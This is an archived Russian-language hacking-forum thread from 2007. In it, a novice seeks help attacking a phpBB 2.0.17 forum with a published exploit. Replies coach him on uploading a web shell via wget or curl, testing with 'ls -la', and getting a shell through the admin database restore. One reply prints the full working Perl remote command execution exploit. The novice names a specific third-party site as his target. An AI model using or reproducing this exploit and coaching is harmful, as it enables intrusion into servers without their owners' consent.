PDA

Просмотр полной версии : Вопрос по сплойту от rst для форума phpbb v.2.0.17


shiky
27.08.2007, 18:01
Люди прошу помощи со сплойтом rst для форума phpbb v.2.0.17
Скачал сплойт, запустил... в поле cmd ввел cmd(мб что то другое) мне сплойт пишет что user r57************ sucefull registered. что дальше делать?

DeBugger
27.08.2007, 18:56
Дальше введённая команда должна была выполниться через баг в профиле пользователя.

У меня с этим эксплоитом ни разу ничего не вышло.
А вот r57phpbba2e2.pl - phpBB admin 2 exec exploit иногда работал.
Руками через восстановление БД в админке всё же лучше и надёжнее.

shiky
27.08.2007, 19:39
блин я в этом деле совсем не секу...читал читал и болты =)
расскажи как "руками через восстановление базы"? буду благодарен

shiky
27.08.2007, 19:44
и еще-использовать команду надо wget или curl чтоб залить шелл на форум. Я так сделал(шелл заливал с ФТП) сплойт пишет тоже самое user registered. Куда дальше идти? ****/forum/r57shell.php? этого файла нету(404 ошибка)

DeBugger
27.08.2007, 20:00
Я обо всех тонкостях прочитал на этом форуме. Советую попробовать поиск.

Например, http://forum.antichat.ru/thread24488.html

shiky
27.08.2007, 20:18
я просто не разбираюсь в этом...вот...напиши плз как шеллом пользоваться и как его через сплойт загрузить.

DeBugger
27.08.2007, 20:24
Я бы посоветовал сравнить требования сплойта с реальной ситуацией на форуме. Вдруг он там работать не может. Попробуй выполнить команду ls -la (поправьте люди, если напутал). Если получишь список файлов, можно идти дальше.

shiky
27.08.2007, 20:27
а где юзать эту команду? расскажи подробнее плз

DeBugger
27.08.2007, 20:38
Если ты имеешь ввиду именно "phpBB <= 2.0.17 remote command execution exploit" (r57phpBB2017), то про использование всё написано в нём самом. Ввести: r57phpBB2017.pl http://www.site.ru/forum/ ls -la

shiky
27.08.2007, 20:46
выдает сообщение user r57**********sucefull registered

DeBugger
29.08.2007, 13:13
А ты уверен в уязвимости форума? Успешная регистрация не гарантирует успешное выполнение комманды.

shiky
29.08.2007, 13:34
если хочешь посмотреть на сие чудо-тебе сюда =)

http://torrents.ok.vsi.ru/forum/

Nightmarе
29.08.2007, 15:25
Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???

DeBugger
29.08.2007, 18:21
Если не сложно, то объясните суть уязвимости, какой скрипт бажный и т.д.. что именно делают эти сплойты???
Вот образец сплойта. Думаю поймёшь, что он делает:
#!/usr/bin/perl

# phpBB <= 2.0.17 remote command execution exploit
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off
# ------------------------------------------------
# (c)oded by 1dt.w0lf
# RST/GHC
# http://rst.void.ru
# http://ghc.ru
# 03.11.05

use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV < 2) { usage(); }

head();

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

for($i=0;$i<5;$i++)
{
$rand .= int(rand(9));
}

$name = 'Gavrik'.$rand;
$password = 'Gavrik'.$rand;
$path = $ARGV[0];
$cmd = $ARGV[1];
$xpl->cookie_jar( $cookie_jar );

$res = $xpl->post(
$path.'profile.php?GLOBALS[signature_bbcode_uid]=(.%2B)/e%00',

Content => [
'username' => $name,
'email' => $rand.'_bill_gates@microsoft.com',
'new_password' => $password,
'password_confirm' => $password,
'signature' => 'r57:`'.$cmd.'`',
'viewemail' => '0',
'hideonline' => '1',
'notifyreply' => '0',
'notifypm' => '0',
'popup_pm' => '0',
'attachsig' => '0',
'allowbbcode' => '1',
'allowhtml' => '1',
'allowsmilies' => '0',
'mode' => 'register',
'agreed' => 'true',
'coppa' => '0',
'submit' => 'Submit',
],
);
if($res->content =~ /form action=\"profile.php/) { print "Failed to register user $name\r\n"; exit(); }
else { print "Done. User $name successfully registered!\r\n"; }
$res = $xpl->post(
$path.'login.php',
Content => [
'username' => $name,
'password' => $password,
'redirect' => '',
'login' => 'Log in',
],Referer => $path.'login.php');

$res = $xpl->get($path.'profile.php?mode=editprofile');
@content = split("\n",$res->content);
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
for(@content)
{
if(/<\/textarea>/) { $p = 0; }
print $_."\r\n" if $p;
if(/<textarea name="signature"/){ $p = 1; }
}
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";

sub head()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
print " PhpBB <= 2.0.17, PHP 5 < 5.0.5 remote command execution exploit by RST/ GHC\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
}
sub usage()
{
head();
print " Usage: r57phpBB2017.pl <path> <cmd>\r\n";
print " <path> - Path to forum e.g. http://phpbb.com/forum/\r\n";
print " <cmd> - Command for execute\r\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
print "(c)oded by 1dt.w0lf , RST/GHC , http://rst.void.ru , http://ghc.ru\r\n" ;
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~\r\n";
exit();
}
В версии 2.0.19 эта возможность блокирована, но суть баги жива. Через восстановление БД форума можно изменить необходимые поля и получить шелл.

Кстати, форум по ссылке мёртв. Кто-то уже добрался?

shiky
13.10.2007, 22:10
Возможно-он не отвечает около 2-х недель. но не я виновник =)

shiky
13.10.2007, 22:19
и еще. сплоит выдал: Done. User Gavrik06526 successfully registered! что дальше делать?

blackybr
14.10.2007, 21:33
# need for work:
# 1. PHP 5 < 5.0.5
# 2. register_globals=On
# 3. magic_quotes off

это первое что нужно. ес ли это выполняетчся, то лучше использовать все вручную, благо сплоит - один единственный запрос к сайту )